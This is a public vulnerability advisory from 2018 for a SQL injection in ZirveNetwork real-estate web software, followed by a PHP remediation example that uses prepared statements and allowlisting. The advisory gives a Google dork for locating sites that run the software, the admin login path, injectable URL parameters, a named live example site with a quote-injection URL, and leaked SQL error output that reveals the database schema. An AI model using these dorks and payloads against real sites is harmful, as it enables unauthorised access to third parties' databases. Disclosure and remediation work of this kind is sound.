ZirveNetwork SQL Injection Vulnerability

2018.09.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################################
# Exploit Title : ZirveNetwork SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/09/2018
# Vendor Homepage : zirvenetwork.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''zirvenetwork.com''
# Admin Panel Path : /admin/login.php
# Exploit :
/?page=main-page&list_type=[SQL Injection]
/?lang=tr&page=services&id=[SQL Injection]
#################################################################################################
# Example Site => platingayrimenkul.com.tr/?lang=tr&page=services&id=43%27
=> [ Proof of Concept ] => archive.is/2QJQ6
# SQL Database Error =>
SQL_ERROR_TITLE
SQL_ERROR_CODE 0
SQL_QUERY select count(*) as count_row from t_advert where Visible='1' and 1\'='1'
SQL_ERROR You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'='1'' at line 1
SQL_ERROR_TITLE
SQL_ERROR_CODE 0
SQL_QUERY select t1.ID as advert_id, advert_title, t1.SquareMeter, t1.RentPrice, t1.RentCurrency, t1.AdvertType, t2.Name as estate_status, t3.Name as estate_type, t4.Name as estate_city, t5.Name as estate_township, t6.Name as estate_area, (select Images from t_advert_images where Visible='1' and ParentID=t1.ID order by Seq asc LIMIT 0,1) as estate_images from t_advert t1 left join t_properties t2 on t1.EstateStatus=t2.ItemID and t2.PageLang='Türkçe' and t2.PageType='EstateStatus' left join t_properties t3 on t1.EstateType=t3.ItemID and t3.PageLang='Türkçe' and t3.PageType='EstateType' left join t_city t4 on t1.City=t4.ID left join t_township t5 on t1.Township=t5.ID left join t_area t6 on t1.Area=t6.ID where t1.Visible='1' and t1.1\'='1' order by ADate desc limit 0,0
SQL_ERROR You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'='1' order by ADate desc limit 0,0' at line 21
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

References:

https://www.cyberizm.org/cyberizm-zirvenetwork-sql-injection-vulnerability.html
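
The error output above shows request input reaching the WHERE clause with its quote backslash-escaped (`1\'='1'`) and still breaking the statement, with the full query returned to the client. The following is an added remediation example, not code from the advisory or from ZirveNetwork: a hypothetical PHP handler that binds the value, allowlists the column, and keeps database errors server-side. The function name, the `list_type` to column mapping and the sample rows are assumptions; table and column names are taken from the error output.

```php
<?php
// Hypothetical handler (added example, not ZirveNetwork code).
// t_advert, Visible, EstateType, EstateStatus, RentPrice, ADate come from the error output;
// listAdverts(), the allowlist keys and the sample rows are assumptions.
const LIST_TYPE_COLUMNS = [ // request value => fixed column name
    'type'   => 'EstateType',
    'status' => 'EstateStatus',
];

function listAdverts(PDO $db, string $listType, string $id): array
{
    // Identifiers cannot be bound as parameters, so map them through an allowlist.
    $column = LIST_TYPE_COLUMNS[$listType] ?? null;
    // A numeric parameter must parse as an integer; quote escaping does not make "43'" a number.
    $value = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($column === null || $value === false) {
        return ['status' => 400, 'rows' => []];
    }
    try {
        $stmt = $db->prepare(
            "SELECT ID, RentPrice FROM t_advert
             WHERE Visible = '1' AND $column = :value ORDER BY ADate DESC"
        );
        $stmt->bindValue(':value', $value, PDO::PARAM_INT);
        $stmt->execute();
        return ['status' => 200, 'rows' => $stmt->fetchAll(PDO::FETCH_ASSOC)];
    } catch (PDOException $e) {
        // Log details server-side; never echo the query or driver error to the client.
        error_log('advert query failed: ' . $e->getMessage());
        return ['status' => 500, 'rows' => []];
    }
}

// Constructed sample data in in-memory SQLite so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE t_advert (ID INTEGER PRIMARY KEY, RentPrice INTEGER,
           Visible TEXT, EstateType INTEGER, EstateStatus INTEGER, ADate TEXT)");
$db->exec("INSERT INTO t_advert VALUES (1, 2500, '1', 43, 2, '2018-09-01'),
                                       (2, 4000, '1', 7, 2, '2018-09-02')");

// One valid request, then a quoted value in each parameter.
foreach ([['type', '43'], ['type', "43'"], ["1'", '43']] as [$listType, $id]) {
    $r = listAdverts($db, $listType, $id);
    printf("list_type=%s id=%s -> %d, %d row(s)\n", $listType, $id, $r['status'], count($r['rows']));
}
```

The example needs PHP 7.1 or later with the `pdo_sqlite` extension; the same `prepare`/`bindValue` calls apply unchanged to a MySQL PDO connection.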



Copyright 2018, cxsecurity.com

 
